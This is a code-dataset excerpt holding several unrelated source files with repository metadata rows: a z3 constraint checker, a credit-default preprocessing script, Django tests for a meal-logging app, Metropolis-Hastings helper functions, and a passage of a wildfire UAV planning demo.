solver.add(dt > 0) # time needs to pass
# flip it
if check:
solver.add(z3.Not(condition)) # currently sat, check if time can make it unsat
else: # currently not sat
solver.add(condition) # check if time can make it sat
objective = solver.minimize(dt) # get the minimum
returnvalue = None
if solver.check() == z3.sat:
logger.debug(f"The condition evaluation can change though with a dt of: {objective.value()}")
logger.debug(solver.model())
# epsilonify
inf_coeff, numeric_coeff, eps_coeff = objective.lower_values()
returnvalue = Epsilon(numeric_coeff, eps_coeff)
else:
logger.debug(f"The condition evaluation cannot change by passing of time")
solver.pop() # pop the second backtracking point (#3)
solver.pop() # final pop initial solver point (#1)
return returnvalue
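# Rough usage sketch (names are assumptions, not crestdsl API): with opt = z3.Optimize() and
# dt = z3.Real('dt'), ConstraintSet([dt >= 0], dt > 5).check_behaviour_change(opt, dt, z3.main_ctx())
# should return something like Epsilon(5, 1) ('just after dt == 5'), or None when no change is possible.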
class Z3ConditionChangeCalculator(Z3Converter):
def __init__(self, z3_vars, entity, container, use_integer_and_real=True):
super().__init__(z3_vars, entity, container, use_integer_and_real)
# self.to_z3 = copy.deepcopy(self.__class__.to_z3)
# self.to_z3.register(list, self.to_z3_list)
# self.to_z3.register(ast.If, self.to_z3_astIf)
# self.dts = [] # remove me
# self.dts_eps = []
self.all_constraints = []
self.constraint_sets_to_check = []
def calculate_constraints(self, function):
self.to_z3(function)
return self.constraint_sets_to_check
def to_z3_list(self, obj):
""" in a list, convert every one of the parts individually"""
constraints = []
for stmt in obj:
new_constraint = self.to_z3(stmt)
if isinstance(new_constraint, str):
continue
if new_constraint is None:
continue # skip if nothing happened (e.g. for print expressions or just a comment string)
# logger.info(f"adding {new_constraint}")
if isinstance(new_constraint, list):
constraints.extend(new_constraint)
self.all_constraints.extend(new_constraint)
else:
constraints.append(new_constraint)
self.all_constraints.append(new_constraint)
return constraints
# TODO: to be fully tested
def to_z3_astIfExp(self, obj):
""" a if b else c"""
condition = self.to_z3(obj.test)
condition_type = self.resolve_type(obj.test)
condition_cast = self.cast(condition, condition_type, BOOL)
cs = ConstraintSet(self.all_constraints.copy(), condition_cast)
cs.set_label(f"If-Expression at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
all_constraints_backup = self.all_constraints.copy() # save the state before exploring
self.all_constraints.append(condition_cast)  # condition to get into the then-branch
body = self.to_z3(obj.body) # explores the then-branch and creates the constraints
self.all_constraints = all_constraints_backup.copy() # reset
self.all_constraints.append(z3.Not(condition_cast))  # condition to get into the else-branch
orelse = self.to_z3(obj.orelse)
self.all_constraints = all_constraints_backup.copy() # reset again
then_type = self.resolve_type(obj.body)
else_type = self.resolve_type(obj.orelse)
target_type = self.resolve_two_types(then_type, else_type)
ret_val = z3.If(condition_cast,
self.cast(body, then_type, target_type),
self.cast(orelse, else_type, target_type)
)
return ret_val
# TODO: to be fully tested
def to_z3_astIf(self, obj):
test = self.to_z3(obj.test)
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"If-Condition at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
all_constraints_backup = self.all_constraints.copy() # save the state before exploring
body_ins, else_ins = self.get_astIf_ins(obj)
self.all_constraints.append(test)
self.all_constraints.extend(body_ins)
body = self.to_z3(obj.body) # explores the then-branch and creates the constraints
orelse = []
if obj.orelse:
self.all_constraints = all_constraints_backup.copy() # reset
self.all_constraints.append(z3.Not(test)) # condition to get in here
self.all_constraints.extend(else_ins)
orelse = self.to_z3(obj.orelse)
self.all_constraints = all_constraints_backup.copy() # reset again
# standard behaviour (unfortunately we have to copy)
body_outs = []
else_outs = []
ifstmt = z3.If(test,
z3.And(body_ins + body + body_outs),
z3.And(else_ins + orelse + else_outs))
return ifstmt
def to_z3_astCall(self, obj):
func_name = SH.get_attribute_string(obj.func)
if func_name == "min":
val1 = self.to_z3(obj.args[0])
val2 = self.to_z3(obj.args[1])
test = val1 <= val2
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"min function at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
return super().to_z3_astCall(obj)
if func_name == "max":
val1 = self.to_z3(obj.args[0])
val2 = self.to_z3(obj.args[1])
test = val1 >= val2
cs = ConstraintSet(self.all_constraints.copy(), z3.And(test))
cs.set_label(f"Max function at Line #{obj.lineno}")
self.constraint_sets_to_check.append(cs)
return super().to_z3_astCall(obj)
logger.error("You will probably see wrong results, because the analysis does not work for function calls yet.")
return super().to_z3_astCall(obj)
| 38.985782
| 119
| 0.633479
|
1d3e0cf9f28c9e6c82f8fc396e535cd7c100ab0e
| 4,599
|
py
|
Python
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 2
|
2021-11-23T01:07:30.000Z
|
2021-12-09T20:09:10.000Z
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 23
|
2021-11-19T19:30:38.000Z
|
2021-12-13T22:43:57.000Z
|
src/transform_data.py
|
liannah/credit_default_prediction
|
10a372b9524d726c2d25e6b59fe91e4df1a18b22
|
[
"MIT"
] | 5
|
2021-11-19T04:43:36.000Z
|
2021-11-20T01:09:58.000Z
|
#!/usr/bin/env python
# Author: Taiwo Owoseni
# date: 2021-11-23
"""Transforms csv file and output transformed data to directory as csv file.
Usage: src/transform_data.py --input_path=<input_path> --out_dir=<out_dir>
Options:
--input_path=<input_path> Path (filepath) to cleaned data (script supports only csv)
--out_dir=<out_dir> Path (directory) to save transformed train and test data
"""
import numpy as np
import os
import pandas as pd
from docopt import docopt
from sklearn.compose import make_column_transformer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder,StandardScaler
opt = docopt(__doc__)
def save_file(path_dir, file_name, processed_data ):
"""
Save the processed data as a csv file.
This function writes the DataFrame to the given directory,
creating the directory first if it does not exist yet.
Parameters
----------
path_dir : str
The path to save the file.
file_name: str
The file name of the document.
processed_data: pd.DataFrame
The object to be saved.
Examples
--------
save_file('data/split', 'train_data', train_df)
"""
file_path = os.path.join(path_dir, file_name)
try:
processed_data.to_csv(file_path, index = False, encoding='utf-8')
except OSError:
os.makedirs(os.path.dirname(file_path))
processed_data.to_csv(file_path, index = False, encoding='utf-8')
def read_data(file_path):
"""
Reads a csv file from path.
Parameters
----------
file_path : str
The path of the file.
Returns
-------
data : pd.DataFrame
A csv file
Examples
--------
read_file('data/split/train.csv')
"""
try:
abs_path = os.path.abspath(file_path)
except FileNotFoundError:
raise ("Absolute path to {input_file} not found in home directory")
else:
data = pd.read_csv(abs_path)
return data
def main(input_path, out_dir):
filename, file_extension = os.path.splitext(input_path)
# assertion tests
assert file_extension == ".csv", f"Wrong exteension type. Extension has to be {file_extension}"
data = read_data(input_path)
column_list = ['LIMIT_BAL', 'SEX', 'EDUCATION', 'MARRIAGE', 'AGE', 'PAY_0', 'PAY_2',
'PAY_3', 'PAY_4', 'PAY_5', 'PAY_6', 'BILL_AMT1', 'BILL_AMT2',
'BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6', 'PAY_AMT1',
'PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6',
'DEFAULT_PAYMENT_NEXT_MONTH']
assert list(data.columns) == column_list, f"Wrong Data Frame : Features should be {column_list}"
X = data.drop(columns="DEFAULT_PAYMENT_NEXT_MONTH")
y = data["DEFAULT_PAYMENT_NEXT_MONTH"]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=123)
numeric_features = ['LIMIT_BAL', 'AGE', 'BILL_AMT1', 'BILL_AMT2',
'BILL_AMT3', 'BILL_AMT4', 'BILL_AMT5', 'BILL_AMT6', 'PAY_AMT1',
'PAY_AMT2', 'PAY_AMT3', 'PAY_AMT4', 'PAY_AMT5', 'PAY_AMT6']
categorical_features = ['SEX', 'MARRIAGE', 'PAY_0', 'PAY_2',
'PAY_3', 'PAY_4', 'PAY_5', 'PAY_6' ]
ordinal_features = ['EDUCATION']
preprocessor = make_column_transformer(
(StandardScaler(),numeric_features),
(OneHotEncoder(drop="if_binary", sparse=False,
handle_unknown="ignore", dtype="int"),
categorical_features),
("passthrough", ordinal_features)
)
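# The resulting transformer scales the numeric columns, one-hot encodes the categorical ones
# (binary categories collapse to a single 0/1 column because of drop='if_binary'), and passes the
# EDUCATION column through unchanged.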
preprocessed_X_train = preprocessor.fit_transform(X_train)
preprocessed_X_test = preprocessor.transform(X_test)
# get the column names of the preprocessed data
column_names = np.concatenate(
[np.array(numeric_features),
preprocessor.named_transformers_['onehotencoder'].get_feature_names_out(),
np.array(ordinal_features)]
)
trans_train_data = pd.DataFrame(
data = preprocessed_X_train,
columns = column_names
)
trans_test_data = pd.DataFrame(
data = preprocessed_X_test,
columns = column_names
)
trans_train_data["DEFAULT_PAYMENT_NEXT_MONTH"] = y_train.values
trans_test_data["DEFAULT_PAYMENT_NEXT_MONTH"] = y_test.values
# save transformed data after splitting
save_file(out_dir, "transformed_train.csv", trans_train_data)
save_file(out_dir,"transformed_test.csv", trans_test_data)
if __name__ == "__main__":
main(opt["--input_path"], opt["--out_dir"])
| 31.285714
| 100
| 0.642096
|
22a9957df9b7d88d7b0855d9d3e65958887fd09f
| 13,208
|
py
|
Python
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 1
|
2021-03-18T00:12:09.000Z
|
2021-03-18T00:12:09.000Z
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 104
|
2020-09-09T18:52:33.000Z
|
2020-12-16T15:17:56.000Z
|
project/nutrihacker/tests/test_daily_log.py
|
COSC481W-2020Fall/cosc481w-581-2020-fall-nutrition-helper
|
a8ddb4b8c0703e376d5bb0f668ef003e2ed203e8
|
[
"MIT"
] | 1
|
2021-03-17T21:35:51.000Z
|
2021-03-17T21:35:51.000Z
|
from datetime import datetime, timedelta
from decimal import Decimal
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth.models import User
from nutrihacker.models import DailyLog, MealLog, MealFood, Food
# populates temp database
def create_foods():
foods = {
'sweetroll': ['Sweetroll', Decimal('38.20'), Decimal('200.00'), Decimal('5.40'), Decimal('10.00'), Decimal('0.00'),
Decimal('14.00'), Decimal('1.10')
],
'mubcrablegs': ['Mudcrab Legs', Decimal('54.90'), Decimal('150.00'), Decimal('2.10'), Decimal('340.00'), Decimal('20.00'),
Decimal('2.00'), Decimal('9.00')
],
'eidarcheese': ['Eidar Cheese', Decimal('100.00'), Decimal('90.00'), Decimal('80.00'), Decimal('70.00'), Decimal('60.00'),
Decimal('50.00'), Decimal('40.00')
],
'soulhusk': ['Soul Husk', Decimal('10.00'), Decimal('20.00'), Decimal('30.00'), Decimal('40.00'), Decimal('50.00'),
Decimal('60.00'), Decimal('70.00')
],
'mammothsteak': ['Mammoth Steak', Decimal('20.00'), Decimal('40.00'), Decimal('60.00'), Decimal('80.00'), Decimal('100.00'),
Decimal('120.00'), Decimal('140.00')
],
'horkerstew': ['Horker Stew', Decimal('110.00'), Decimal('120.00'), Decimal('130.00'), Decimal('140.00'), Decimal('150.00'),
Decimal('160.00'), Decimal('170.00')
],
'garlicbread': ['Garlic Bread', Decimal('77.70'), Decimal('66.60'), Decimal('55.50'), Decimal('44.40'), Decimal('33.30'),
Decimal('22.20'), Decimal('11.10')
],
'spicedwine': ['Spiced Wine', Decimal('100.00'), Decimal('98.00'), Decimal('86.00'), Decimal('74.00'), Decimal('62.00'),
Decimal('50.00'), Decimal('48.00')
],
}
for key in foods:
Food.objects.create(
name=foods[key][0],
servingSize=foods[key][1],
calories=foods[key][2],
totalFat=foods[key][3],
cholesterol=foods[key][4],
sodium=foods[key][5],
totalCarb=foods[key][6],
protein=foods[key][7]
)
# creates and logs in a user
def login_user(client):
name = 'test'
pword = 'djangotest159'
user = User.objects.create_user(name, password=pword)
client.login(username=name, password=pword)
return user
# creates a log with three meals (2:3:3 number of foods)
def create_one_log(client):
create_foods()
user = login_user(client)
now = datetime.now().replace(second=0, microsecond=0)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
}
)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'extra_field_count':2
}
)
client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=6).id,
'portions1':Decimal('1.6'),
'food2':Food.objects.get(id=7).id,
'portions2':Decimal('1.7'),
'food3':Food.objects.get(id=8).id,
'portions3':Decimal('1.8'),
'extra_field_count':2
}
)
return user, now
class LogCreateTests(TestCase):
# tests successful creation of a log using DailyLog, MealLog, and MealFood
def test_create_log(self):
create_foods()
user = login_user(self.client)
now = datetime.now().replace(second=0, microsecond=0)
# test creating a log with one food
food1 = Food.objects.get(id=1)
portions1 = Decimal('1.5')
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that the correct logs were created and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.all(), ['<MealLog: ' + str(now) + '>'])
self.assertQuerysetEqual(MealFood.objects.all(), ['<MealFood: ' + str(now) + ' ' + food1.name + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# test creating another MealLog of multiple foods for the same day
food2 = Food.objects.get(id=2)
portions2 = Decimal('1')
food3 = Food.objects.get(id=3)
portions3 = Decimal('0.75')
food4 = Food.objects.get(id=4)
portions4 = Decimal('2.5')
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':now.time(),
'food1':food2.id,
'portions1':portions2,
'food2':food3.id,
'portions2':portions3,
'food3':food4.id,
'portions3':portions4,
'extra_field_count':2
},
follow=True
)
# builds a list that mimics a QuerySet
mealfood_qs = []
for i in range(4):
mealfood_qs.append('<MealFood: ' + str(now) + ' ' + Food.objects.get(id=i+1).name + '>')
# confirm that the correct logs were created and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.all(), ['<MealLog: ' + str(now) + '>',
'<MealLog: ' + str(now) + '>'], ordered=False)
self.assertQuerysetEqual(MealFood.objects.all(), mealfood_qs, ordered=False)
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# tests invalid future dates and times
def test_create_future_log_not_allowed(self):
create_foods()
user = login_user(self.client)
now = datetime.now().replace(second=0, microsecond=0)
food1 = Food.objects.get(id=1)
portions1 = Decimal('1.5')
# test creating a log 30 minutes in the future
future1 = now + timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':now.date(),
'time':future1.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that no logs were created and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), [])
self.assertQuerysetEqual(MealLog.objects.all(), [])
self.assertQuerysetEqual(MealFood.objects.all(), [])
self.assertEqual(response.status_code, 200)
# test creating a log 1 day in the future
future2 = now + timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_create'),
{
'date':future2.date(),
'time':now.time(),
'food1':food1.id,
'portions1':portions1,
'extra_field_count':0
},
follow=True
)
# confirm that no logs were created and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), [])
self.assertQuerysetEqual(MealLog.objects.all(), [])
self.assertQuerysetEqual(MealFood.objects.all(), [])
self.assertEqual(response.status_code, 200)
class LogUpdateTests(TestCase):
def test_update_log_date_time(self):
user, now = create_one_log(self.client)
# test updating a log to 30 minutes in the past
past1 = now - timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':past1.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that MealLog time was changed and user redirected to correct page
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(past1) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# test updating a log to 1 day in the past
past2 = now - timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':2}),
{
'date':past2.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'extra_field_count':2
},
follow=True
)
# confirm that a new DailyLog was created, MealLog date was changed, and user redirected to correct page
self.assertQuerysetEqual(DailyLog.objects.filter(id=2), ['<DailyLog: ' + str(past2.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.filter(id=2), ['<MealLog: ' + str(past2) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':2})))
# test updating a log's date to an existing DailyLog
past3 = now - timedelta(days=2)
dl = DailyLog.create(user, past3.date()) # create a DailyLog using past3
dl.save()
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':3}),
{
'date':past3.date(),
'time':now.time(),
'food1':Food.objects.get(id=6).id,
'portions1':Decimal('1.6'),
'food2':Food.objects.get(id=7).id,
'portions2':Decimal('1.7'),
'food3':Food.objects.get(id=8).id,
'portions3':Decimal('1.8'),
'extra_field_count':2
},
follow=True
)
# confirm that MealLog date was changed to existing DailyLog, and user redirected to correct page
self.assertQuerysetEqual(MealLog.objects.filter(id=3), ['<MealLog: ' + str(past3) + '>'])
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':dl.id})))
def test_update_log_food_portions(self):
user, now = create_one_log(self.client)
# test updating by changing the food and portions for existing fields and adding more food+portions
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':now.time(),
'food1':Food.objects.get(id=3).id,
'portions1':Decimal('1.3'),
'food2':Food.objects.get(id=4).id,
'portions2':Decimal('1.4'),
'food3':Food.objects.get(id=5).id,
'portions3':Decimal('1.5'),
'food4':Food.objects.get(id=6).id,
'portions4':Decimal('1.6'),
'extra_field_count':3
},
follow=True
)
# builds a list that mimics a QuerySet
mealfood_qs = []
for i in range(4):
mealfood_qs.append('<MealFood: ' + str(now) + ' ' + Food.objects.get(id=i+3).name + '>')
mealfood_list = MealFood.objects.filter(meal_log__id=1) # get MealFood list for the MealLog
portions = Decimal('1.3')
for mealfood in mealfood_list:
# confirm that each MealFood's portions field is correct
self.assertEqual(mealfood.portions, portions)
portions += Decimal('0.1')
# confirm that MealFood list is correct, and user redirected to correct page
self.assertQuerysetEqual(mealfood_list, mealfood_qs, ordered=False)
self.assertRedirects(response, (reverse('nutrihacker:log_detail', kwargs={'pk':1})))
# tests invalid future dates and times
def test_update_to_future_date_not_allowed(self):
user, now = create_one_log(self.client)
# test updating a log to 30 minutes in the future
future1 = now + timedelta(minutes=30)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':now.date(),
'time':future1.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that the MealLog time did not change and an error was raised
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(now) + '>'])
self.assertEqual(response.status_code, 200)
future2 = now + timedelta(days=1)
response = self.client.post(
reverse('nutrihacker:log_update', kwargs={'pk':1}),
{
'date':future2.date(),
'time':now.time(),
'food1':Food.objects.get(id=1).id,
'portions1':Decimal('1.1'),
'food2':Food.objects.get(id=2).id,
'portions2':Decimal('1.2'),
'extra_field_count':1
},
follow=True
)
# confirm that no DailyLog was created, MealLog date did not change, and an error was raised
self.assertQuerysetEqual(DailyLog.objects.all(), ['<DailyLog: ' + str(now.date()) + '>'])
self.assertQuerysetEqual(MealLog.objects.filter(id=1), ['<MealLog: ' + str(now) + '>'])
self.assertEqual(response.status_code, 200)
class LogModelTests(TestCase):
# tests the get_total function for DailyLog, MealLog, MealFood
# DL's get_total is dependent on ML's which is dependent on MF's, so testing DL's means testing all of them
def test_get_total(self):
create_one_log(self.client)
dl = DailyLog.objects.get(id=1)
total = {
'calories':0,
'totalFat':0,
'cholesterol':0,
'sodium':0,
'totalCarb':0,
'protein':0
}
# calculate the total nutrients for the daily log
portions = Decimal('1.1')
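# create_one_log hardcodes portions 1.1 through 1.8 across its three meals, so the expected
# total is rebuilt here with the same increasing sequence.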
for mf in MealFood.objects.all():
# get the nutrients of each food
nutrients = mf.food.get_nutrients()
# add the nutrients multiplied by portions
for key in total:
total[key] += nutrients[key] * portions
# increment portions as they were hardcoded
portions += Decimal('0.1')
# test the get_total calculation against hardcoded calculation
self.assertEqual(dl.get_total(), total)
| 32.53202
| 126
| 0.663462
|
af33a31658688310d5af6b0e8c8d4b5a68afd40c
| 3,374
|
py
|
Python
|
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
helpers.py
|
riccardocadei/Metropolis-Hastings-for-optimization
|
2d69685285b216cfd78df9558667f7b9fa27f4a0
|
[
"MIT"
] | null | null | null |
"""
Some helpful functions to run Markov chain simulations.
"""
import scipy.stats as st
import numpy as np
import scipy as sp
import pandas as pd
import matplotlib.pyplot as plt
import copy
import time
from DatasetGenerator import *
def vect_to_S(x):
"""
Compute the subset S of cities corresponding to the vector encoding
Parameters
----------
x: ndarray of shape (n,)
Returns
-------
S: ndarray, the subset of corresponding cities
"""
return np.nonzero(x)[0]
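# Example: vect_to_S(np.array([0, 1, 0, 1])) -> array([1, 3]), i.e. cities 1 and 3 are in S.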
def f(S, lambda_, data):
"""
Compute the objective function (that we want to maximize).
Parameters
----------
S: subset of P({0,..., n-1}) as an array of shape (k,) with k the size of S
lambda_: float, the fixed value of the deployment cost
data: Dataset
Returns
-------
f: The evaluated objective function.
"""
n, coords, pop, dists = data.N, data.x, data.v, data.d
# consider only coordinates of cities in S
pop_S = pop[S]
max_dist_S = np.max(dists[S,:][:,S]) if len(S) > 1 else 0
f = np.sum(pop_S) - (1/4) * lambda_ * n * np.pi * (max_dist_S)**2
return f
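# Equivalently: f(S) = sum_{i in S} v_i - (lambda * N * pi / 4) * (max_{i,j in S} d_ij)^2, so a
# far-away city is only worth adding if its population outweighs the enlarged radius penalty.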
def max_distance(x, dists, max_cities=False):
"""
Compute the pairwise distance between cities represented by x
and return the maximum distance among all of them.
Parameters
----------
x: ndarray of shape (n,)
dists: ndarray, the matrix distance between all cities in the working dataset
max_cities: boolean, whether to return the city couples realising the argmax
Return
------
max_dist: float, the maximum distance among all pairwise distances between cities represented by x
city_maxs: list of tuples (returned if max_cities == True), the couple of cities that intervene in the maximum distance
"""
S_x = vect_to_S(x)
max_dist = np.max(dists[S_x,:][:,S_x]) if len(S_x) > 1 else 0
if not max_cities:
return max_dist
# also return the couple of cities realising the maximum distance
ind_maxs = np.argwhere(dists[S_x,:][:,S_x] == max_dist if len(S_x) > 1 else 0) # indices in dist matrice of the max distance
city_maxs = np.zeros(ind_maxs.shape[0], dtype=tuple) # change the indices to the city number
for n, (i, j) in enumerate(ind_maxs):
city_maxs[n] = (S_x[i], S_x[j])
return max_dist, city_maxs
### Function for the competition:
def preprocessing_data(csv_file):
"""
Load the competition data from a csv file into pandas and build the starting state.
"""
#Importing the csv file as Dataframe
df = pd.read_csv(csv_file, index_col="city id")
#Computing starting state
starting_state = np.zeros(len(df))
starting_state[df['normalized population'] == df['normalized population'].max()] = 1
#Converting the df to a Dataset object
data = Dataset_competition(N=len(df))
data.x = df[['position x', 'position y']].to_numpy()
data.v = df['normalized population'].to_numpy()
data.d = sp.spatial.distance.cdist(data.x, data.x, 'euclidean')
return starting_state, data
def submission(csv_file, Sapprox, save_file_name):
#Importing the csv file as Dataframe
df_submission = pd.read_csv(csv_file, usecols = ["city id"])
df_submission['1/0 variable'] = 0
df_submission.loc[Sapprox, '1/0 variable'] = 1
df_submission.to_csv(save_file_name, index=False)
| 29.33913
| 129
| 0.658566
|
73f281c4de5e4799fbd2108224e9d438e948dadb
| 17,729
|
py
|
Python
|
python/fire_rs/planning/demo_winterpaper.py
|
arthur-bit-monnot/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 13
|
2018-11-19T15:51:23.000Z
|
2022-01-16T11:24:21.000Z
|
python/fire_rs/planning/demo_winterpaper.py
|
fire-rs-laas/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 14
|
2017-10-12T16:19:19.000Z
|
2018-03-12T12:07:56.000Z
|
python/fire_rs/planning/demo_winterpaper.py
|
fire-rs-laas/fire-rs-saop
|
321e16fceebf44e8e97b482c24f37fbf6dd7d162
|
[
"BSD-2-Clause"
] | 4
|
2018-03-12T12:28:55.000Z
|
2021-07-07T18:32:17.000Z
|
# Copyright (c) 2017, CNRS-LAAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This demo draws result figures for the winter2017 paper"""
import logging
import numpy as np
import matplotlib
import matplotlib.cm
import fire_rs.uav_planning as op
import fire_rs.neptus_interface as neptus
import fire_rs.firemapping as fmapping
import fire_rs.geodata.display
from fire_rs.firemodel import propagation
from fire_rs.geodata.geo_data import TimedPoint, GeoData
from fire_rs.planning.planning import FireMapper, FlightConf, Planner, PlanningEnvironment, \
UAVConf, Waypoint
from fire_rs.planning.display import TrajectoryDisplayExtension, plot_plan_trajectories
logging.basicConfig(level=logging.DEBUG)
def SAOP_conf(min_time: float, max_time: float) -> 'dict':
# Write down the desired VNS configuration
conf_vns = {
"full": {
"max_restarts": 5,
"max_time": 60.0,
"neighborhoods": [
{"name": "dubins-opt",
"max_trials": 100,
"generators": [
{"name": "MeanOrientationChangeGenerator"},
{"name": "RandomOrientationChangeGenerator"},
{"name": "FlipOrientationChangeGenerator"}]},
{"name": "one-insert",
"max_trials": 50,
"select_arbitrary_trajectory": True,
"select_arbitrary_position": False},
]
}
}
conf = {
'min_time': min_time,
'max_time': max_time,
'save_every': 0,
'save_improvements': False,
'discrete_elevation_interval': 0,
'vns': conf_vns['full']
}
conf['vns']['configuration_name'] = 'full'
return conf
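# Interpretation (not verified against the planner): 'min_time'/'max_time' presumably bound the
# planning horizon handed to SAOP, while the 60 s 'max_time' inside the 'full' block looks like
# the wall-clock budget for the VNS search itself.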
def wp_insertion() -> "fire_rs.geodata.display.GeoDataDisplay":
"""Plot a case with an small fire. Overlay arrows indicating fire propagation direction"""
# Geographic environment (elevation, landcover, wind...)
wind = (2., 0.)
area = ((480000.0, 480200.0), (6210000.0, 6210200.0))
env = PlanningEnvironment(area, wind_speed=wind[0], wind_dir=wind[1],
planning_elevation_mode='flat', flat_altitude=0)
ignition_points = [
TimedPoint(area[0][0], area[1][0], 0),
]
logging.info("Start of propagation")
fire = propagation.propagate_from_points(env, ignition_points, 180 * 60)
logging.info("End of propagation")
fire1 = fire.ignitions()
gdd = fire_rs.geodata.display.GeoDataDisplay.pyplot_figure(env.raster.combine(fire1),
)
gdd.add_extension(TrajectoryDisplayExtension, (None,), {})
# print(env.raster.x_offset)
